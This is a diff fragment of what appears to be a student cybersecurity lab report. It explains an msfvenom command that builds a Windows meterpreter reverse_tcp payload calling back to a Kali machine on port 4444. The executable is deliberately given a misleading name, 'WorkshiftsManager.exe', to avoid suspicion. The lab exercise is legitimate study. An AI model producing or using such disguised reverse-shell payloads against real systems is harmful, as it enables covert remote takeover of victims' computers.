AM311/Cybersecurity_Report/home.md

     `msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp  LHOST=10.0.2.15 -b "\x00" -f exe -o ./Desktop/WorkshiftsManager.exe`

 	 `msfvenom` is a pre-installed payload generator and encoder available on Kali, through which we build a `.exe` file executable on all Windows devices.
-This payload will spawn a reverse shell client, which will connect to the reverse shell server listening on the Kali machine (`10.0.2.15`).
+This payload will spawn a reverse shell client, which will connect to the reverse shell server listening on the Kali machine (`10.0.2.15`) on the default TCP port (`4444`).

 	The output of the command execution is a `.exe` file that we will find on the Kali's desktop.
 	The name of the executable (`WorkShiftsManager.exe`) is deliberately misleading since we want not to raise any suspicion.